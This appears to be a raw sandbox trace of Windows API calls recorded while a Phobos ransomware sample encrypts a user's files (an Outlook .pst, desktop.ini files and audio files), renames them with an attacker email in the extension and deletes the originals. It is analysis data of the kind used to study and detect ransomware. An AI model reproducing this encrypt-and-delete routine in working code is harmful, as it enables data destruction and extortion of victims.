CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.707] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.707] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0197.772] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.772] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x42400, lpOverlapped=0x0) returned 1 [0197.815] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x42410, dwBufLen=0x42410 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x42410) returned 1 [0197.825] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x42410, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x42410, lpOverlapped=0x0) returned 1 [0197.829] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0197.829] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.829] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0197.829] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.829] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0197.830] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.830] CloseHandle (hObject=0x15c) returned 1 [0197.830] CloseHandle (hObject=0xac) returned 1 [0197.830] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst")) returned 1 [0197.832] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0197.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.833] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=580) returned 1 [0197.833] CloseHandle (hObject=0xac) returned 1 [0197.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini")) returned 0x6 [0197.833] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.833] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.833] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.834] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0197.834] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.834] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x244, lpOverlapped=0x0) returned 1 [0197.835] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250, dwBufLen=0x250 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x250) returned 1 [0197.835] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x250, lpOverlapped=0x0) returned 1 [0197.836] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0197.836] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.836] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0197.836] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.836] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0197.836] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.836] CloseHandle (hObject=0xac) returned 1 [0197.836] CloseHandle (hObject=0x15c) returned 1 [0197.836] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini")) returned 1 [0197.837] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0197.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.837] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=504) returned 1 [0197.837] CloseHandle (hObject=0x15c) returned 1 [0197.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini")) returned 0x26 [0197.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.838] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.838] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.838] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0197.838] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.838] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1f8, lpOverlapped=0x0) returned 1 [0197.839] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200, dwBufLen=0x200 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200) returned 1 [0197.839] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x200, lpOverlapped=0x0) returned 1 [0197.840] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0197.840] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.840] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0197.840] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.840] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0197.840] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.840] CloseHandle (hObject=0x15c) returned 1 [0197.840] CloseHandle (hObject=0xac) returned 1 [0197.840] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini")) returned 1 [0197.841] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0197.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\2Adwwj9NYTJwF8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\2adwwj9nytjwf8.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0197.933] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=85341) returned 1 [0197.933] CloseHandle (hObject=0x168) returned 1 [0197.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\2Adwwj9NYTJwF8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\2adwwj9nytjwf8.m4a")) returned 0x20 [0197.933] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\2Adwwj9NYTJwF8.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\2adwwj9nytjwf8.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\2Adwwj9NYTJwF8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\2adwwj9nytjwf8.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0197.933] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.934] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\2Adwwj9NYTJwF8.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\2adwwj9nytjwf8.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0197.984] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0197.984] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.984] ReadFile (in: hFile=0x168, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x14d5d, lpOverlapped=0x0) returned 1 [0197.986] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x14d60, dwBufLen=0x14d60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x14d60) returned 1 [0197.987] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x14d60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x14d60, lpOverlapped=0x0) returned 1 [0197.999] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0197.999] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.999] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0197.999] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0197.999] WriteFile (in: hFile=0x174, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0197.999] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.999] CloseHandle (hObject=0x168) returned 1 [0197.999] CloseHandle (hObject=0x174) returned 1 [0198.261] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\2Adwwj9NYTJwF8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\2adwwj9nytjwf8.m4a")) returned 1 [0198.262] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\X9etM8U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\x9etm8u.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.263] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=71974) returned 1 [0198.263] CloseHandle (hObject=0x140) returned 1 [0198.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\X9etM8U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\x9etm8u.wav")) returned 0x20 [0198.263] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\X9etM8U.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\x9etm8u.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\X9etM8U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\x9etm8u.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.263] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.263] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\X9etM8U.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\x9etm8u.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.264] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.264] ReadFile (in: hFile=0x140, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11926, lpOverlapped=0x0) returned 1 [0198.265] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x11930, dwBufLen=0x11930 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x11930) returned 1 [0198.266] WriteFile (in: hFile=0x118, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x11930, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x11930, lpOverlapped=0x0) returned 1 [0198.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0198.268] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.268] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0198.268] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.268] WriteFile (in: hFile=0x118, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0198.268] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.268] CloseHandle (hObject=0x140) returned 1 [0198.268] CloseHandle (hObject=0x118) returned 1 [0198.268] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\X9etM8U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\x9etm8u.wav")) returned 1 [0198.269] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0198.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SeKJDfMT02ty2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sekjdfmt02ty2.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.270] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=100204) returned 1 [0198.270] CloseHandle (hObject=0x118) returned 1 [0198.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SeKJDfMT02ty2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sekjdfmt02ty2.m4a")) returned 0x20 [0198.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SeKJDfMT02ty2.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sekjdfmt02ty2.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SeKJDfMT02ty2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sekjdfmt02ty2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0198.270] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.270] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0198.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SeKJDfMT02ty2.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sekjdfmt02ty2.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.271] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0198.271] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0198.271] ReadFile (in: hFile=0x118, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1876c, lpOverlapped=0x0) returned 1 [0198.273] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, 